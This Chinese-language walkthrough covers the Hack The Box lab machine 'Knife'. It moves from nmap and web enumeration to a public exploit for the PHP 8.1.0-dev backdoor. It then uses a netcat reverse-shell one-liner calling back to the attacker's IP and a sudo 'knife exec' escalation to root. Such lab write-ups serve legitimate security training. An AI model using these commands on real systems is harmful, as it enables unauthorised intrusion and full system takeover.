免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
┌──(rootkali)-[~/htb/Knife]└─# nmap -sV -Pn 10.10.10.242 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-27 23:34 ESTNmap scan report for 10.10.10.242Host is up (0.34s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 60.42 seconds目录爆破
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.242 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492Output File: /root/dirsearch/reports/10.10.10.242/_21-11-27_23-34-49.txtError Log: /root/dirsearch/logs/errors-21-11-27_23-34-49.logTarget: http://10.10.10.242/[23:34:50] Starting: [23:36:09] 200 - 6KB - /index.php [23:36:09] 200 - 6KB - /index.php/login/ 如同没有啥特地有用的页面或者目录
源代码审查
没看进去有啥有用的货色
软件版本枚举
80端口是一个叫EMA的网站展现页,查了一下,EMA就是Emergent Medical Associates,紧急医疗服务。没看进去有用啥显著的cms
Apache版本没看到有啥有用的破绽
ssh版本没看到有啥有用的破绽
初始shell
查看站点信息:
┌──(rootkali)-[~/htb/Knife]└─# whatweb -a 3 http://10.10.10.242/ http://10.10.10.242/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.10.242], PHP[8.1.0-dev], Script, Title[Emergent Medical Idea], X-Powered-By[PHP/8.1.0-dev] 看到网站用的是PHP/8.1.0-dev版本,在谷歌搜寻发现这个开发版本存在一个backdoor,咱们应用这个攻打脚本拿初始shell
把攻打代码下载到本地,动员攻打:
┌──(rootkali)-[~/htb/Knife]└─# python3 499933.py Enter the full host url:http://10.10.10.242Interactive shell is opened on http://10.10.10.242 Can't acces tty; job crontol turned off.$ iduid=1000(james) gid=1000(james) groups=1000(james)$ whoamijames拿到一个初始shell
拿到user.txt
$ find / -name user.txt/home/james/user.txt提权
查看sudo特权
$ sudo -lMatching Defaults entries for james on knife: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser james may run the following commands on knife: (root) NOPASSWD: /usr/bin/knife能够无明码应用knife
咱们应用上面命令提权到root
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
返回:
$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'No input file specified.通过测试咱们发现exp并不是一个残缺的shell,很多命令不能正确执行
查看以后用户家目录,发现有ssh登录凭证
$ ls -alh /home/james/.sshtotal 16Kdrwx------ 2 james james 4.0K May 18 2021 .drwxr-xr-x 5 james james 4.0K May 18 2021 ..-rw------- 1 james james 3.4K May 7 2021 id_rsa-rw-r--r-- 1 james james 741 May 7 2021 id_rsa.pub把公钥加到靶机id_rsa.pub,把私钥下载到本地,用ssh -i登录,发现还是要应用明码,查看ssh配置/etc/ssh/sshd_config,发现没有开启私钥登录设置
如同又走到死胡同。。
而后一个个枚举反弹残缺的shell到kali,发现上面这个payload是能够运行的
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4242 >/tmp/f
拿到root.txt
┌──(rootkali)-[~/htb/Knife]└─# nc -lnvp 4242listening on [any] 4242 ...connect to [10.10.14.5] from (UNKNOWN) [10.10.10.242] 38954/bin/sh: 0: can't access tty; job control turned off$ python3 -c "__import__('pty').spawn('/bin/bash')"james@knife:/$ sudo /usr/bin/knife exec -E 'exec "/bin/sh"'sudo /usr/bin/knife exec -E 'exec "/bin/sh"'# # ididuid=0(root) gid=0(root) groups=0(root)# whoamiwhoamiroot# cat /root/root.txtcat /root/root.txt{逗你玩儿~}